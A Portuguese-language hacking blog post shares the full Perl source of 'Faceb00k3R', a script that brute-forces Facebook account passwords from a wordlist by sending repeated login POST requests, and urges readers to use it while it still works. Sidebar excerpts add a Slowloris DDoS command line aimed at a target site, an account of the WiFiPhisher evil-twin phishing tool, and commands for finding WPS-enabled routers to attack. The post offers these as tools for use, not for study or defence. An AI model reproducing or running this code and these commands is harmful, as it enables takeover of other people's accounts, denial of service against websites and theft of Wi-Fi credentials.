Pular para o conteúdo principal

Faceb00k3R tool , e melhor em perl

Corra enquanto ainda funciona


segue versão com user agente em pt-br para melhor engenharia social

github http://goo.gl/8cv6Lp

 #!/usr/bin/perl  
 #  
 use strict;  
 use Net::SSLeay::Handle;  
 if(!defined($ARGV[0] && $ARGV[1])) {  
 system('clear');  
 print "                Version 2.32 \n";  
 print "\033[1;32md88888b .d8b.  .o88b. d88888b d8888b. .d88b. db  dD d88888b d8888b. \n";  
 print "88'   d8' `8b d8P Y8 88'   88 `8D .8P Y8. 88 ,8P' 88'   88 `8D \n";  
 print "88ooo  88ooo88 8P   88ooooo 88oooY' 88  88 88,8P  88ooooo 88oobY' \n";  
 print "88~~~  88~~~88 8b   88~~~~~ 88~~~b. 88  88 88`8b  88~~~~~ 88`8b  \n";  
 print "88   88  88 Y8b d8 88.   88  8D `8b d8' 88 `88. 88.   88 `88. \n";  
 print "YP   YP  YP `Y88P' Y88888P Y8888P' `Y88P' YP  YD Y88888P 88  YD \n";  
 print "\033[1;31m     ======================================================\n";  
 print "\033[1;37m        Usage: perl $0 Email wordlist.txt\n\n\n\n\n\n\n\n\n";  
 print "\033[1;31m     ======================================================\n";  
 print "\n";  
 print "\n";  
 print "\n";  
 print "\n";  
 print "\n";  
 print "\n";  
 exit; }  
 my $user = $ARGV[0];  
 my $wordlist = $ARGV[1];  
 open (LIST, $wordlist) || die "\n[-] Can't find/open $wordlist\n";  
 print "                Version 2.32 \n";  
 print "\033[1;32md88888b .d8b.  .o88b. d88888b d8888b. .d88b. db  dD d88888b d8888b. \n";  
 print "88'   d8' `8b d8P Y8 88'   88 `8D .8P Y8. 88 ,8P' 88'   88 `8D \n";  
 print "88ooo  88ooo88 8P   88ooooo 88oooY' 88  88 88,8P  88ooooo 88oobY' \n";  
 print "88~~~  88~~~88 8b   88~~~~~ 88~~~b. 88  88 88`8b  88~~~~~ 88`8b  \n";  
 print "88   88  88 Y8b d8 88.   88  8D `8b d8' 88 `88. 88.   88 `88. \n";  
 print "YP   YP  YP `Y88P' Y88888P Y8888P' `Y88P' YP  YD Y88888P 88  YD \n";  
 print "\033[1;31m     ======================================================\n";  
 print "\033[1;31m              VISIT US ON FACEBOOK:         \n";  
 print "\033[1;31m         https://www.facebook.com/BackTrack.Fan.Page/   \n";  
 print "\033[1;33m              Made by [[Cyb3rw0rM]]         \n";  
 print "\033[1;31m     ========================================================\n";  
 print "\033[1;39m\n [+] Cracking Started on: $user ...\n\n";  
 print "=======================================\n";  
 while (my $password = <LIST>) {  
 chomp ($password);  
 $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;  
 my $a = "POST /login.php HTTP/1.1";  
 my $b = "Host: www.facebook.com";  
 my $c = "Connection: close";  
 my $e = "Cache-Control: max-age=0";  
 my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";  
 my $g = "Origin: https://www.facebook.com";  
 my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";  
 my $i = "Content-Type: application/x-www-form-urlencoded";  
 my $j = "Accept-Encoding: gzip,deflate,sdch";  
 my $k = "Accept-Language: en-US,en;q=0.8";  
 my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";  
 my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";  
 my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";  
 my $cl = length($post);  
 my $d = "Content-Length: $cl";  
 my ($host, $port) = ("www.facebook.com", 443);  
 tie(*SSL, "Net::SSLeay::Handle", $host, $port);  
 print SSL "$a\n";  
 print SSL "$b\n";  
 print SSL "$c\n";  
 print SSL "$d\n";  
 print SSL "$e\n";  
 print SSL "$f\n";  
 print SSL "$g\n";  
 print SSL "$h\n";  
 print SSL "$i\n";  
 print SSL "$j\n";  
 print SSL "$k\n";  
 print SSL "$l\n";  
 print SSL "$cookie\n\n";  
 print SSL "$post\n";  
 my $success;  
 while(my $result = <SSL>){  
 if($result =~ /Location(.*?)/){  
 $success = $1;  
 }  
 }  
 if (!defined $success)  
 {  
 print "\033[1;31m[-] $password -> Failed \n";  
 close SSL;  
 }  
 else  
 {  
 print "\033[1;32m\n########################################################\n";  
 print "[+] \033[1;32mPassword Cracked: $password\n";  
 print "\033[1;32m########################################################\n\n";  
 close SSL;  
 exit;  
 }  
 }  

Comentários

Postagens mais visitadas deste blog

Realizar DDos Attack usando Slowloris

Salve esse arquivo como "slowloris.pl". Download do script. http://pastebin.com/2M4ZAHpz Abra o terminal e siga os seguintes comandos:   cd Desktop                    ( o local deve ser substituído pelo local do arquivo, nesse caso se encontra no Desktop ) chmod +x slowloris.pl perl ./slowloris.pl -dns www.target.com -port 80 -timeout 1 -num 1000 -cache 1- Substitua a URL pelo endereço do alvo. 2- Nesse caso será disparado 1000 pacotes a cada 1 segundo.

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de

Como encontrar a WPS Routers Habilitados - Kali Linux

Como você poderia encontrar WPS Routers ativado?  Sério é muito fácil de encontrar WPS habilitado roteadores, mas depois que eu postei o meu tutorial sobre como cortar o WPA / WPA2 WiFi Protected muitos povos me enviado mensagens para saber como eles poderiam encontrar WPS habilitado router? por isso é muito simples e limitado a um comando único sim, vamos usar o comando de lavagem para esse fim. O comando que podemos utilizar para encontrar WPS habilitado roteadores está abaixo. wash -i mon0 -C Tenha em mente que o "C" neste alfabeto "C" deve ser a capital Também tenha em mente antes de entrar este comando por favor ligar o interface de moniter ou este comando não funciona mais assim para que você moniter tipo de interface o comando abaixo primeiro e depois tentar digitalizar routers WPS habilitados. airmon-ng start wlan0  Agora isso vai lhe dar todos os roteadores que possuem botão WPS / push ativado em cima delas e você pode tentar cortar-lhes a seu p